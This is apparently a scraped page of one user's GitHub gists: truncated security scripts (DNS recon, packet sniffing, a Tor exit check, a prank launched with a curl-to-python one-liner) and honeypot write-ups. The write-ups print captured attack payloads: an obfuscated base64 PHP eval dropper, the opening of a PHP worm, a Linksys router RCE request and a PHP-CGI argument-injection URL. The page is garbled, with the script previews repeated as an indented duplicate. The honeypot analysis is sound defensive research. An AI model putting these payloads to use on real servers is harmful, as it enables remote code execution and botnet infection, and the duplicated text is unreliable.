dustyfresh dustyfresh

## unlockedws.py
#!/usr/bin/python
# This is a friendly reminder that you should lock your computer.
#
# Moves mouse cursor to random location and taunts the unsuspecting user
#
#
# Run like ninja:
# python <(curl -s https://gist.githubusercontent.com/dustyfresh/2b836ff3a207fc02f50105f5902db2f4/raw/91354fcb70b63fbd6eebf92da9dcd1608560729e/unlockedws.py) &
#
# <@dustyfresh>

## fierce.pl
#!/usr/bin/perl

#########################################
# Fierce v1.0.3 - Beta 03/23/2008
# By RSnake http://ha.ckers.org/fierce/
# Threading by IceShaman
# Zone transfer and additional patches by Jabra
#########################################

use strict; #warnings off after testing

## dnsdumpster.py
#!/usr/bin/env python
# Thanks to PaulSec! (https://github.com/PaulSec/API-dnsdumpster.com)
import json
import argparse
from DNSDumpsterAPI import DNSDumpsterAPI

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='dnsdumpster CLI client')
    parser.add_argument('--domain', '-d', type=str, required=True, help='domain name to check')
    args = parser.parse_args()

## honeypress-payload-1.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                dustyfresh
                / honeypress-payload-1.md
            
            
              Last active
              February 15, 2018 15:22
            
              
                analysis of one of the first payloads caught by HoneyPress
              
          
    Interesting payload:

195.154.183.187 - - [12/Jun/2016 18:46:03] "coco=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOyRucGF0aD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLkJhU0U2NF9kRWNPZEUoJF9HRVRbJ3o0J10pO2Z1bmN0aW9uIGNyZWF0ZUZvbGRlcigkcGF0aCl7aWYoIWZpbGVfZXhpc3RzKCRwYXRoKSl7Y3JlYXRlRm9sZGVyKGRpcm5hbWUoJHBhdGgpKTtta2RpcigkcGF0aCwgMDc3Nyk7fX1jcmVhdGVGb2xkZXIoJG5wYXRoKTtlY2hvKCItPnwiKTs7JGM9JF9QT1NUWyJ6MiJdOyRmPSRucGF0aC5CYVNFNjRfZEVjT2RFKCRfR0VUWyJ6MyJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49dXJsZGVjb2RlKCIlIi5zdWJzdHIoJGMsJGksMikpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpPyIxIjoiMCIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3d&z2=393839303030300D0A3C3F706870200D0A246D756A6A203D20245F504F53545B277A275D3B2069662028246D756A6A213D222229207B202478737365723D62


## honeypress-payload-2.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dustyfresh
                / honeypress-payload-2.md
            
            
              Last active
              June 17, 2016 03:41
            
              
                PHP malware
              
          
    @dustyfresh

PHP Worm

This worm seems to be defunct now.. the C&C servers that this code references (over HTTP) don't seem to function any longer.

<?php
@ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);

  
## checkTor.py
#!/usr/bin/env python
import requests
import re

def checkTor(ip):
	headers = {'user-agent': 'checkTor'}
	exit_nodes = requests.get('https://check.torproject.org/exit-addresses', headers=headers)
	exit_nodes = exit_nodes.text
	if re.search(ip, exit_nodes):
		return True

## honeypress-payload-3.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dustyfresh
                / honeypress-payload-3.md
            
            
              Created
              June 22, 2016 16:34
            
              
                linksys RCE botnet payload caught by HoneyPress
              
          
    Payload found to be unrelated to WordPress. Seems to be trying to build a botnet by exploiting Linksys E-Series routers
> db.payloads.find({'ip': '179.158.120.213'}).pretty()
{
        "_id" : ObjectId("576a421f83932a00168098be"),
        "Tor" : false,
        "ip" : "179.158.120.213",
        "user-agent" : "Wget(linux)",
        "triggered_url" : "http://178.62.224.8/hndUnblock.cgi",


## honeypress-payload-5.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dustyfresh
                / honeypress-payload-5.md
            
            
              Last active
              August 16, 2016 04:23
            
          
    Payload

> db.payloads.find({ip: '176.94.194.90'}).pretty()
{
	"_id" : ObjectId("577f2c88247fe0000e2831a8"),
	"Tor" : false,
	"ip" : "176.94.194.90",
	"user-agent" : "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
	"triggered_url" : "http://178.62.224.8/phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n",
	"time" : "1467952264",


## do_not_scan.txt
# Martian ranges
0.0.0.0/8
10.0.0.0/8
100.64.0.0/10
127.0.0.0/8
127.0.53.53
169.254.0.0/16
172.16.0.0/12
192.0.0.0/24
192.0.2.0/24

## sniff-example.py
#!/usr/bin/env python3
from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import re

def packet_callback(packet):
    if packet[TCP].payload:
        pkt = str(packet[TCP].payload)
        if packet[IP].dport == 80:
	#!/usr/bin/python
	# This is a friendly reminder that you should lock your computer.
	#
	# Moves mouse cursor to random location and taunts the unsuspecting user
	#
	#
	# Run like ninja:
	# python <(curl -s https://gist.githubusercontent.com/dustyfresh/2b836ff3a207fc02f50105f5902db2f4/raw/91354fcb70b63fbd6eebf92da9dcd1608560729e/unlockedws.py) &
	#
	# <@dustyfresh>
	#!/usr/bin/perl

	#########################################
	# Fierce v1.0.3 - Beta 03/23/2008
	# By RSnake http://ha.ckers.org/fierce/
	# Threading by IceShaman
	# Zone transfer and additional patches by Jabra
	#########################################

	use strict; #warnings off after testing
	#!/usr/bin/env python
	# Thanks to PaulSec! (https://github.com/PaulSec/API-dnsdumpster.com)
	import json
	import argparse
	from DNSDumpsterAPI import DNSDumpsterAPI

	if __name__ == "__main__":
	parser = argparse.ArgumentParser(description='dnsdumpster CLI client')
	parser.add_argument('--domain', '-d', type=str, required=True, help='domain name to check')
	args = parser.parse_args()
	#!/usr/bin/env python
	import requests
	import re

	def checkTor(ip):
	headers = {'user-agent': 'checkTor'}
	exit_nodes = requests.get('https://check.torproject.org/exit-addresses', headers=headers)
	exit_nodes = exit_nodes.text
	if re.search(ip, exit_nodes):
	return True
	# Martian ranges
	0.0.0.0/8
	10.0.0.0/8
	100.64.0.0/10
	127.0.0.0/8
	127.0.53.53
	169.254.0.0/16
	172.16.0.0/12
	192.0.0.0/24
	192.0.2.0/24
	#!/usr/bin/env python3
	from scapy.all import *
	import logging
	logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
	import re

	def packet_callback(packet):
	if packet[TCP].payload:
	pkt = str(packet[TCP].payload)
	if packet[IP].dport == 80: